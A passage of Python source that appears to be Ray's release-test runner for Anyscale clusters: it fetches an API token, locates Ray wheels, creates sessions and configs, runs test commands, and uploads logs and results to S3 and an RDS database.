REPORT_S = 30
RETRY_MULTIPLIER = 2
def exponential_backoff_retry(f, retry_exceptions, initial_retry_delay_s,
max_retries):
retry_cnt = 0
retry_delay_s = initial_retry_delay_s
while True:
try:
return f()
except retry_exceptions as e:
retry_cnt += 1
if retry_cnt > max_retries:
raise
logger.info(f"Retry function call failed due to {e} "
f"in {retry_delay_s} seconds...")
time.sleep(retry_delay_s)
retry_delay_s *= RETRY_MULTIPLIER
def maybe_fetch_api_token():
if GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] is None:
logger.info(
"Missing ANYSCALE_CLI_TOKEN, retrieving from AWS secrets store")
# NOTE(simon) This should automatically retrieve
# release-automation@anyscale.com's anyscale token
GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] = boto3.client(
"secretsmanager", region_name="us-west-2"
).get_secret_value(
SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"release-automation/"
"anyscale-token20210505220406333800000001-BcUuKB")["SecretString"]
class PrepareCommandRuntimeError(RuntimeError):
pass
class ReleaseTestTimeoutError(RuntimeError):
pass
class SessionTimeoutError(ReleaseTestTimeoutError):
pass
class FileSyncTimeoutError(ReleaseTestTimeoutError):
pass
class CommandTimeoutError(ReleaseTestTimeoutError):
pass
class PrepareCommandTimeoutError(ReleaseTestTimeoutError):
pass
# e.g., App config failure.
class AppConfigBuildFailure(RuntimeError):
pass
class State:
def __init__(self, state: str, timestamp: float, data: Any):
self.state = state
self.timestamp = timestamp
self.data = data
sys.path.insert(0, anyscale.ANYSCALE_RAY_DIR)
def anyscale_project_url(project_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/?tab=session-list"
def anyscale_session_url(project_id: str, session_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/clusters/{session_id}"
def anyscale_compute_tpl_url(compute_tpl_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/cluster-computes" \
f"/{compute_tpl_id}"
def anyscale_app_config_build_url(build_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/app-config-details" \
f"/{build_id}"
def wheel_url(ray_version, git_branch, git_commit):
return f"https://s3-us-west-2.amazonaws.com/ray-wheels/" \
f"{git_branch}/{git_commit}/" \
f"ray-{ray_version}-cp37-cp37m-manylinux2014_x86_64.whl"
def wheel_exists(ray_version, git_branch, git_commit):
url = wheel_url(ray_version, git_branch, git_commit)
return requests.head(url).status_code == 200
def commit_or_url(commit_or_url: str) -> str:
if commit_or_url.startswith("http"):
# Directly return the S3 url
if "s3" in commit_or_url and "amazonaws.com" in commit_or_url:
return commit_or_url
# Resolve the redirects for buildkite artifacts
# This is needed because otherwise pip won't recognize the file name.
if "buildkite.com" in commit_or_url and "artifacts" in commit_or_url:
return requests.head(commit_or_url, allow_redirects=True).url
# Else, assume commit
os.environ["RAY_COMMIT"] = commit_or_url
return wheel_url(GLOBAL_CONFIG["RAY_VERSION"], GLOBAL_CONFIG["RAY_BRANCH"],
commit_or_url)
def get_latest_commits(repo: str, branch: str = "master") -> List[str]:
cur = os.getcwd()
with tempfile.TemporaryDirectory() as tmpdir:
os.chdir(tmpdir)
clone_cmd = [
"git",
"clone",
"--filter=tree:0",
"--no-checkout",
# "--single-branch",
# "--depth=10",
f"--branch={branch}",
repo,
tmpdir,
]
log_cmd = [
"git",
"log",
"-n",
"10",
"--pretty=format:%H",
]
subprocess.check_output(clone_cmd)
commits = subprocess.check_output(log_cmd).decode(
sys.stdout.encoding).split("\n")
os.chdir(cur)
return commits
def find_ray_wheels(repo: str, branch: str, version: str):
url = None
commits = get_latest_commits(repo, branch)
logger.info(f"Latest 10 commits for branch {branch}: {commits}")
for commit in commits:
if wheel_exists(version, branch, commit):
url = wheel_url(version, branch, commit)
os.environ["RAY_WHEELS"] = url
os.environ["RAY_COMMIT"] = commit
logger.info(
f"Found wheels URL for Ray {version}, branch {branch}: "
f"{url}")
break
return url
def populate_wheels_sanity_check(commit: Optional[str] = None):
if not commit:
cmd = ("python -c 'import ray; print("
"\"No commit sanity check available, but this is the "
"Ray wheel commit:\", ray.__commit__)'")
else:
cmd = (f"python -c 'import ray; "
f"assert ray.__commit__ == \"{commit}\", ray.__commit__'")
os.environ["RAY_WHEELS_SANITY_CHECK"] = cmd
def _check_stop(stop_event: multiprocessing.Event, timeout_type: str):
if stop_event.is_set():
if timeout_type == "prepare_command":
raise PrepareCommandTimeoutError(
"Process timed out in the prepare command stage.")
if timeout_type == "command":
raise CommandTimeoutError(
"Process timed out while running a command.")
elif timeout_type == "file_sync":
raise FileSyncTimeoutError(
"Process timed out while syncing files.")
elif timeout_type == "session":
raise SessionTimeoutError(
"Process timed out while starting a session.")
else:
assert False, "Unexpected timeout type."
def _deep_update(d, u):
for k, v in u.items():
if isinstance(v, collections.abc.Mapping):
d[k] = _deep_update(d.get(k, {}), v)
else:
d[k] = v
return d
def _dict_hash(dt: Dict[Any, Any]) -> str:
json_str = json.dumps(dt, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
def _load_config(local_dir: str, config_file: Optional[str]) -> Optional[Dict]:
if not config_file:
return None
config_path = os.path.join(local_dir, config_file)
with open(config_path, "rt") as f:
# Todo: jinja2 render
content = f.read()
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
content = jinja2.Template(content).render(env=env)
return yaml.safe_load(content)
def _wrap_app_config_pip_installs(app_config: Dict[Any, Any]):
"""Wrap pip package install in quotation marks"""
if app_config.get("python", {}).get("pip_packages"):
new_pip_packages = []
for pip_package in app_config["python"]["pip_packages"]:
new_pip_packages.append(f"\"{pip_package}\"")
app_config["python"]["pip_packages"] = new_pip_packages
def has_errored(result: Dict[Any, Any]) -> bool:
return result.get("status", "invalid") != "finished"
def maybe_get_alert_for_result(result_dict: Dict[str, Any]) -> Optional[str]:
# If we get a result dict, check if any alerts should be raised
from alert import SUITE_TO_FN, default_handle_result
logger.info("Checking if results are valid...")
# Copy dict because we modify kwargs here
handle_result_kwargs = result_dict.copy()
handle_result_kwargs["created_on"] = None
test_suite = handle_result_kwargs.get("test_suite", None)
handle_fn = SUITE_TO_FN.get(test_suite, None)
if not handle_fn:
logger.warning(f"No handle for suite {test_suite}")
alert = default_handle_result(**handle_result_kwargs)
else:
alert = handle_fn(**handle_result_kwargs)
return alert
def report_result(test_suite: str, test_name: str, status: str, last_logs: str,
results: Dict[Any, Any], artifacts: Dict[Any, Any],
category: str):
now = datetime.datetime.utcnow()
rds_data_client = boto3.client("rds-data", region_name="us-west-2")
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_TABLE"]
sql = (
f"INSERT INTO {schema} "
f"(created_on, test_suite, test_name, status, last_logs, "
f"results, artifacts, category) "
f"VALUES (:created_on, :test_suite, :test_name, :status, :last_logs, "
f":results, :artifacts, :category)")
parameters = [{
"name": "created_on",
"typeHint": "TIMESTAMP",
"value": {
"stringValue": now.strftime("%Y-%m-%d %H:%M:%S")
},
}, {
"name": "test_suite",
"value": {
"stringValue": test_suite
}
}, {
"name": "test_name",
"value": {
"stringValue": test_name
}
}, {
"name": "status",
"value": {
"stringValue": status
}
}, {
"name": "last_logs",
"value": {
"stringValue": last_logs
}
}, {
"name": "results",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(results)
},
}, {
"name": "artifacts",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(artifacts)
},
}, {
"name": "category",
"value": {
"stringValue": category
}
}]
# Default boto3 call timeout is 45 seconds.
retry_delay_s = 64
MAX_RDS_RETRY = 3
exponential_backoff_retry(
lambda: rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
parameters=parameters,
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql),
retry_exceptions=rds_data_client.exceptions.StatementTimeoutException,
initial_retry_delay_s=retry_delay_s,
max_retries=MAX_RDS_RETRY)
logger.info("Result has been persisted to the databse")
def log_results_and_artifacts(result: Dict):
results = result.get("results", {})
if results:
msg = "Observed the following results:\n\n"
for key, val in results.items():
msg += f" {key} = {val}\n"
else:
msg = "Did not find any results."
logger.info(msg)
artifacts = result.get("artifacts", {})
if artifacts:
msg = "Saved the following artifacts:\n\n"
for key, val in artifacts.items():
msg += f" {key} = {val}\n"
else:
msg = "Did not find any artifacts."
logger.info(msg)
def _cleanup_session(sdk: AnyscaleSDK, session_id: str):
if session_id:
# Just trigger a request. No need to wait until session shutdown.
sdk.terminate_session(
session_id=session_id, terminate_session_options={})
def search_running_session(sdk: AnyscaleSDK, project_id: str,
session_name: str) -> Optional[str]:
session_id = None
logger.info(f"Looking for existing session with name {session_name}")
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(name=dict(equals=session_name)))
if len(result.results) > 0 and result.results[0].state == "Running":
logger.info("Found existing session.")
session_id = result.results[0].id
return session_id
def find_cloud_by_name(sdk: AnyscaleSDK, cloud_name: str,
_repeat: bool = True) -> Optional[str]:
cloud_id = None
logger.info(f"Looking up cloud with name `{cloud_name}`. ")
paging_token = None
while not cloud_id:
result = sdk.search_clouds(
clouds_query=dict(
paging=dict(count=50, paging_token=paging_token)))
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == cloud_name:
cloud_id = res.id
logger.info(
f"Found cloud with name `{cloud_name}` as `{cloud_id}`")
break
if not paging_token or cloud_id or not len(result.results):
break
return cloud_id
def create_or_find_compute_template(
sdk: AnyscaleSDK,
project_id: str,
compute_tpl: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
compute_tpl_id = None
compute_tpl_name = None
if compute_tpl:
# As of Anyscale 0.4.1, it is an error to use the same compute template
# name within the same organization, between different projects.
compute_tpl_name = f"{project_id}/compute/{_dict_hash(compute_tpl)}"
logger.info(f"Tests uses compute template "
f"with name {compute_tpl_name}. Looking up existing "
f"templates.")
paging_token = None
while not compute_tpl_id:
result = sdk.search_compute_templates(
dict(
project_id=project_id,
name=dict(equals=compute_tpl_name),
include_anonymous=True),
paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == compute_tpl_name:
compute_tpl_id = res.id
logger.info(
f"Template already exists with ID {compute_tpl_id}")
break
if not paging_token:
break
if not compute_tpl_id:
logger.info(f"Compute template not found. "
f"Creating with name {compute_tpl_name}.")
try:
result = sdk.create_compute_template(
dict(
name=compute_tpl_name,
project_id=project_id,
config=compute_tpl))
compute_tpl_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create compute "
f"template: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_compute_template(
sdk=sdk,
project_id=project_id,
compute_tpl=compute_tpl,
_repeat=False)
raise e
logger.info(f"Compute template created with ID {compute_tpl_id}")
return compute_tpl_id, compute_tpl_name
def create_or_find_app_config(
sdk: AnyscaleSDK,
project_id: str,
app_config: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
app_config_id = None
app_config_name = None
if app_config:
app_config_name = f"{project_id}-{_dict_hash(app_config)}"
logger.info(f"Test uses an app config with hash {app_config_name}. "
f"Looking up existing app configs with this name.")
paging_token = None
while not app_config_id:
result = sdk.list_app_configs(
project_id=project_id, count=50, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == app_config_name:
app_config_id = res.id
logger.info(
f"App config already exists with ID {app_config_id}")
break
if not paging_token or app_config_id:
break
if not app_config_id:
logger.info("App config not found. Creating new one.")
try:
result = sdk.create_app_config(
dict(
name=app_config_name,
project_id=project_id,
config_json=app_config))
app_config_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create app "
f"config: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_app_config(
sdk=sdk,
project_id=project_id,
app_config=app_config,
_repeat=False)
raise e
logger.info(f"App config created with ID {app_config_id}")
return app_config_id, app_config_name
def run_bash_script(local_dir: str, bash_script: str):
previous_dir = os.getcwd()
bash_script_local_dir = os.path.dirname(bash_script)
file_name = os.path.basename(bash_script)
full_local_dir = os.path.join(local_dir, bash_script_local_dir)
os.chdir(full_local_dir)
subprocess.run("./" + file_name, shell=True, check=True)
os.chdir(previous_dir)
def install_app_config_packages(app_config: Dict[Any, Any]):
os.environ.update(app_config.get("env_vars", {}))
packages = app_config["python"]["pip_packages"]
for package in packages:
subprocess.check_output(["pip", "install", "-U", package], text=True)
def install_matching_ray():
wheel = os.environ.get("RAY_WHEELS", None)
if not wheel:
return
assert "manylinux2014_x86_64" in wheel, wheel
if sys.platform == "darwin":
platform = "macosx_10_15_intel"
elif sys.platform == "win32":
platform = "win_amd64"
else:
platform = "manylinux2014_x86_64"
wheel = wheel.replace("manylinux2014_x86_64", platform)
subprocess.check_output(["pip", "uninstall", "-y", "ray"], text=True)
subprocess.check_output(["pip", "install", "-U", wheel], text=True)
def wait_for_build_or_raise(sdk: AnyscaleSDK,
app_config_id: Optional[str]) -> Optional[str]:
if not app_config_id:
return None
# Fetch build
build_id = None
last_status = None
result = sdk.list_builds(app_config_id)
for build in sorted(result.results, key=lambda b: b.created_at):
build_id = build.id
last_status = build.status
if build.status == "failed":
continue
if build.status == "succeeded":
logger.info(f"Link to app config build: "
f"{anyscale_app_config_build_url(build_id)}")
return build_id
if last_status == "failed":
raise AppConfigBuildFailure("App config build failed.")
if not build_id:
raise AppConfigBuildFailure("No build found for app config.")
# Build found but not failed/finished yet
completed = False
start_wait = time.time()
next_report = start_wait + REPORT_S
logger.info(f"Waiting for build {build_id} to finish...")
logger.info(f"Track progress here: "
f"{anyscale_app_config_build_url(build_id)}")
while not completed:
now = time.time()
if now > next_report:
logger.info(f"... still waiting for build {build_id} to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_build(build_id)
build = result.result
if build.status == "failed":
raise AppConfigBuildFailure(
f"App config build failed. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
if build.status == "succeeded":
logger.info("Build succeeded.")
return build_id
completed = build.status not in ["in_progress", "pending"]
if completed:
raise AppConfigBuildFailure(
f"Unknown build status: {build.status}. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
time.sleep(1)
return build_id
def run_job(cluster_name: str, compute_tpl_name: str, cluster_env_name: str,
job_name: str, min_workers: str, script: str,
script_args: List[str], env_vars: Dict[str, str],
autosuspend: int) -> Tuple[int, str]:
# Start cluster and job
address = f"anyscale://{cluster_name}?autosuspend={autosuspend}"
logger.info(f"Starting job {job_name} with Ray address: {address}")
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
env.update(env_vars)
env["RAY_ADDRESS"] = address
env["RAY_JOB_NAME"] = job_name
env["RAY_RELEASE_MIN_WORKERS"] = str(min_workers)
proc = subprocess.Popen(
script.split(" ") + script_args,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True)
proc.stdout.reconfigure(line_buffering=True)
logs = ""
for line in proc.stdout:
logs += line
sys.stdout.write(line)
proc.wait()
return proc.returncode, logs
def create_and_wait_for_session(
sdk: AnyscaleSDK,
stop_event: multiprocessing.Event,
session_name: str,
session_options: Dict[Any, Any],
) -> str:
# Create session
logger.info(f"Creating session {session_name}")
result = sdk.create_session(session_options)
session_id = result.result.id
# Trigger session start
logger.info(f"Starting session {session_name} ({session_id})")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result = sdk.start_session(session_id, start_session_options={})
sop_id = result.result.id
completed = result.result.completed
# Wait for session
logger.info(f"Waiting for session {session_name}...")
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
# Sleep 1 sec before next check.
time.sleep(1)
session_operation_response = sdk.get_session_operation(
sop_id, _request_timeout=30)
session_operation = session_operation_response.result
completed = session_operation.completed
_check_stop(stop_event, "session")
now = time.time()
if now > next_report:
logger.info(f"... still waiting for session {session_name} "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
return session_id
def run_session_command(sdk: AnyscaleSDK,
session_id: str,
cmd_to_run: str,
result_queue: multiprocessing.Queue,
env_vars: Dict[str, str],
state_str: str = "CMD_RUN") -> Tuple[str, int]:
full_cmd = " ".join(f"{k}={v}"
for k, v in env_vars.items()) + " " + cmd_to_run
logger.info(f"Running command in session {session_id}: \n" f"{full_cmd}")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result_queue.put(State(state_str, time.time(), None))
result = sdk.create_session_command(
dict(session_id=session_id, shell_command=full_cmd))
scd_id = result.result.id
return scd_id, result
def wait_for_session_command_to_complete(create_session_command_result,
sdk: AnyscaleSDK,
scd_id: str,
stop_event: multiprocessing.Event,
state_str: str = "CMD_RUN"):
result = create_session_command_result
completed = result.result.finished_at is not None
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
# Sleep 1 sec before next check.
time.sleep(1)
result = exponential_backoff_retry(
lambda: sdk.get_session_command(session_command_id=scd_id),
retry_exceptions=Exception,
initial_retry_delay_s=10,
max_retries=3)
completed = result.result.finished_at
if state_str == "CMD_RUN":
_check_stop(stop_event, "command")
elif state_str == "CMD_PREPARE":
_check_stop(stop_event, "prepare_command")
now = time.time()
if now > next_report:
logger.info(f"... still waiting for command to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
status_code = result.result.status_code
runtime = time.time() - start_wait
if status_code != 0:
if state_str == "CMD_RUN":
raise RuntimeError(
f"Command returned non-success status: {status_code}")
elif state_str == "CMD_PREPARE":
raise PrepareCommandRuntimeError(
f"Prepare command returned non-success status: {status_code}")
return status_code, runtime
def get_command_logs(session_controller: SessionController,
scd_id: str,
lines: int = 50):
result = exponential_backoff_retry(
lambda: session_controller.api_client.get_execution_logs_api_v2_session_commands_session_command_id_execution_logs_get( # noqa: E501
session_command_id=scd_id,
start_line=-1 * lines,
end_line=0),
retry_exceptions=Exception,
initial_retry_delay_s=10,
max_retries=3)
return result.result.lines
def get_remote_json_content(
temp_dir: str,
session_name: str,
remote_file: Optional[str],
session_controller: SessionController,
):
if not remote_file:
logger.warning("No remote file specified, returning empty dict")
return {}
local_target_file = os.path.join(temp_dir, ".tmp.json")
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
with open(local_target_file, "rt") as f:
return json.load(f)
def get_local_json_content(local_file: Optional[str], ):
if not local_file:
logger.warning("No local file specified, returning empty dict")
return {}
with open(local_file, "rt") as f:
return json.load(f)
def pull_artifacts_and_store_in_cloud(
temp_dir: str,
logs: str,
session_name: str,
test_name: str,
artifacts: Optional[Dict[Any, Any]],
session_controller: SessionController,
):
output_log_file = os.path.join(temp_dir, "output.log")
with open(output_log_file, "wt") as f:
f.write(logs)
bucket = GLOBAL_CONFIG["RELEASE_AWS_BUCKET"]
location = f"{GLOBAL_CONFIG['RELEASE_AWS_LOCATION']}" \
f"/{session_name}/{test_name}"
saved_artifacts = {}
s3_client = boto3.client("s3")
s3_client.upload_file(output_log_file, bucket, f"{location}/output.log")
saved_artifacts["output.log"] = f"s3://{bucket}/{location}/output.log"
# Download artifacts
if artifacts:
for name, remote_file in artifacts.items():
logger.info(f"Downloading artifact `{name}` from "
f"{remote_file}")
local_target_file = os.path.join(temp_dir, name)
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
# Upload artifacts to s3
s3_client.upload_file(local_target_file, bucket,
f"{location}/{name}")
saved_artifacts[name] = f"s3://{bucket}/{location}/{name}"
return saved_artifacts
def find_session_by_test_name(
sdk: AnyscaleSDK,
session_controller: SessionController,
temp_dir: str,
state_json: str,
project_id: str,
test_name: str,
) -> Optional[Tuple[str, str, Dict[Any, Any]]]:
paging_token = None
while True: # Will break if paging_token is None after first search
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(
name=dict(contains=test_name),
state_filter=["Running"],
paging=dict(count=20, paging_token=paging_token)))
for session in result.results:
logger.info(f"Found sessions {session.name}")
if not session.name.startswith(test_name):
continue
try:
session_state = get_remote_json_content(
temp_dir=temp_dir,
session_name=session.name,
remote_file=state_json,
session_controller=session_controller)
except Exception as exc:
raise RuntimeError(f"Could not get remote json content "
f"for session {session.name}") from exc
if session_state.get("test_name") == test_name:
return session.id, session.name, session_state
session_token = result.metadata.next_paging_token
if not session_token:
return None
def get_latest_running_command_id(sdk: AnyscaleSDK, session_id: str
) -> Tuple[Optional[str], Optional[bool]]:
scd_id = None
paging_token = None
success = None
while not scd_id:
result = sdk.list_session_commands(
session_id=session_id, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for cmd in result.results:
if not scd_id:
scd_id = cmd.id
completed = cmd.finished_at is not None
if completed:
if success is None:
success = True
success = success and cmd.status_code == 0
if not completed:
return cmd.id, None
return scd_id, success or False
def run_test_config(
local_dir: str,
project_id: str,
test_name: str,
test_config: Dict[Any, Any],
commit_url: str,
session_name: str = None,
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress: bool = False,
upload_artifacts: bool = True,
keep_results_dir: bool = False,
app_config_id_override: Optional[str] = None,
) -> Dict[Any, Any]:
"""
Returns:
Dict with the following entries:
status (str): One of [finished, error, timeout]
command_link (str): Link to command (Anyscale web UI)
last_logs (str): Last logs (excerpt) to send to owner
artifacts (dict): Dict of artifacts
Key: Name
Value: S3 URL
"""
stop_event = multiprocessing.Event()
result_queue = multiprocessing.Queue()
if not session_name:
session_name = f"{test_name}_{int(time.time())}"
temp_dir = tempfile.mkdtemp()
# Result and state files
results_json = test_config["run"].get("results", None)
if results_json is None:
results_json = "/tmp/release_test_out.json"
state_json = test_config["run"].get("state", None)
if state_json is None:
state_json = "/tmp/release_test_state.json"
env_vars = {
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto"),
"TEST_OUTPUT_JSON": results_json,
"TEST_STATE_JSON": state_json,
"IS_SMOKE_TEST": "1" if smoke_test else "0",
}
with open(os.path.join(local_dir, ".anyscale.yaml"), "wt") as f:
f.write(f"project_id: {project_id}")
os.chdir(local_dir)
# Setup interface
# Unfortunately, there currently seems to be no great way to
# transfer files with the Anyscale SDK.
# So we use the session controller instead.
sdk = AnyscaleSDK(auth_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"])
session_controller = SessionController(
api_client=instantiate_api_client(
cli_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"],
host=GLOBAL_CONFIG["ANYSCALE_HOST"],
),
anyscale_api_client=sdk.api_client,
)
cloud_id = test_config["cluster"].get("cloud_id", None)
cloud_name = test_config["cluster"].get("cloud_name", None)
if cloud_id and cloud_name:
raise RuntimeError(
f"You can't supply both a `cloud_name` ({cloud_name}) and a "
f"`cloud_id` ({cloud_id}) in the test cluster configuration. "
f"Please provide only one.")
elif cloud_name and not cloud_id:
cloud_id = find_cloud_by_name(sdk, cloud_name)
if not cloud_id:
raise RuntimeError(
f"Couldn't find cloud with name `{cloud_name}`.")
else:
cloud_id = cloud_id or GLOBAL_CONFIG["ANYSCALE_CLOUD_ID"]
# Overwrite global config so that `_load_config` sets the correct cloud
GLOBAL_CONFIG["ANYSCALE_CLOUD_ID"] = cloud_id
cluster_config_rel_path = test_config["cluster"].get(
"cluster_config", None)
cluster_config = _load_config(local_dir, cluster_config_rel_path)
app_config_rel_path = test_config["cluster"].get("app_config", None)
app_config = _load_config(local_dir, app_config_rel_path)
compute_tpl_rel_path = test_config["cluster"].get("compute_template", None)
compute_tpl = _load_config(local_dir, compute_tpl_rel_path)
timeout = test_config["run"].get("timeout", 1800)
if "RELEASE_OVERRIDE_TIMEOUT" in os.environ:
previous_timeout = timeout
timeout = int(os.environ.get("RELEASE_OVERRIDE_TIMEOUT", str(timeout)))
logger.warning(f"Release test timeout override: {timeout} "
f"(would have been {previous_timeout})")
# If a test is long running, timeout does not mean it failed
is_long_running = test_config["run"].get("long_running", False)
build_id_override = None
if test_config["run"].get("use_connect"):
autosuspend_mins = test_config["run"].get("autosuspend_mins", 5)
assert not kick_off_only, \
"Unsupported for running with Anyscale connect."
if app_config_id_override is not None:
logger.info(
"Using connect and an app config override, waiting until "
"build finishes so we can fetch the app config in order to "
"install its pip packages locally.")
build_id_override = wait_for_build_or_raise(
sdk, app_config_id_override)
response = sdk.get_cluster_environment_build(build_id_override)
app_config = response.result.config_json
install_app_config_packages(app_config)
install_matching_ray()
elif "autosuspend_mins" in test_config["run"]:
raise ValueError(
"'autosuspend_mins' is only supported if 'use_connect' is True.")
# Only wrap pip packages after we installed the app config packages
_wrap_app_config_pip_installs(app_config)
# Add information to results dict
def _update_results(results: Dict):
if "last_update" in results:
results["last_update_diff"] = time.time() - results["last_update"]
if smoke_test:
results["smoke_test"] = True
def _process_finished_command(session_controller: SessionController,
scd_id: str,
results: Optional[Dict] = None,
runtime: int = None,
commit_url: str = None,
session_url: str = None):
logger.info("Command finished successfully.")
if results_json:
results = results or get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
else:
results = {"passed": 1}
_update_results(results)
if scd_id:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
else:
logs = "No command found to fetch logs for"
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=test_config.get("artifacts", {}),
session_controller=session_controller,
)
logger.info("Fetched results and stored on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
# Add these metadata here to avoid changing SQL schema.
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
# When running the test script in client mode, the finish command is a
# completed local process.
def _process_finished_client_command(returncode: int, logs: str):
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=None,
session_controller=None,
)
logger.info("Stored results on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
if results_json:
results = get_local_json_content(local_file=results_json, )
else:
results = {
"passed": int(returncode == 0),
}
results["returncode"] = returncode
_update_results(results)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
def _run(logger):
# These values will be set as the test runs.
session_url = None
runtime = None
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
test_uses_ray_connect = test_config["run"].get("use_connect")
session_id = None
scd_id = None
try:
# First, look for running sessions
session_id = search_running_session(sdk, project_id, session_name)
compute_tpl_name = None
app_config_id = app_config_id_override
app_config_name = None
build_id = build_id_override
if not session_id:
logger.info("No session found.")
# Start session
session_options = dict(
name=session_name, project_id=project_id)
if cluster_config is not None:
logging.info("Starting session with cluster config")
cluster_config_str = json.dumps(cluster_config)
session_options["cluster_config"] = cluster_config_str
session_options["cloud_id"] = cloud_id
session_options["uses_app_config"] = False
else:
logging.info("Starting session with app/compute config")
# Find/create compute template
compute_tpl_id, compute_tpl_name = \
create_or_find_compute_template(
sdk, project_id, compute_tpl)
logger.info(f"Link to compute template: "
f"{anyscale_compute_tpl_url(compute_tpl_id)}")
# Find/create app config
if app_config_id is None:
(
app_config_id,
app_config_name,
) = create_or_find_app_config(sdk, project_id,
app_config)
else:
logger.info(
f"Using override app config {app_config_id}")
app_config_name = sdk.get_app_config(
app_config_id).result.name
if build_id is None:
# We might have already retrieved the build ID when
# installing app config packages locally if using
# connect, so only get the build ID if it's not set.
build_id = wait_for_build_or_raise(sdk, app_config_id)
session_options["compute_template_id"] = compute_tpl_id
session_options["build_id"] = build_id
session_options["uses_app_config"] = True
# Start session
session_id = create_and_wait_for_session(
sdk=sdk,
stop_event=stop_event,
session_name=session_name,
session_options=session_options,
)
prepare_command = test_config["run"].get("prepare")
# Write test state json
test_state_file = os.path.join(local_dir, "test_state.json")
with open(test_state_file, "wt") as f:
json.dump({
"start_time": time.time(),
"test_name": test_name
}, f)
if prepare_command or not test_uses_ray_connect:
if test_uses_ray_connect:
logger.info("Found a prepare command, so pushing it "
"to the session.")
# Rsync up
logger.info("Syncing files to session...")
session_controller.push(
session_name=session_name,
source=None,
target=None,
config=None,
all_nodes=False,
)
logger.info("Syncing test state to session...")
session_controller.push(
session_name=session_name,
source=test_state_file,
target=state_json,
config=None,
all_nodes=False,
)
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
session_id=session_id)
_check_stop(stop_event, "file_sync")
# Optionally run preparation command
if prepare_command:
logger.info(
f"Running preparation command: {prepare_command}")
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=prepare_command,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_PREPARE")
_, _ = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_PREPARE")
if test_uses_ray_connect:
script_args = test_config["run"].get("args", [])
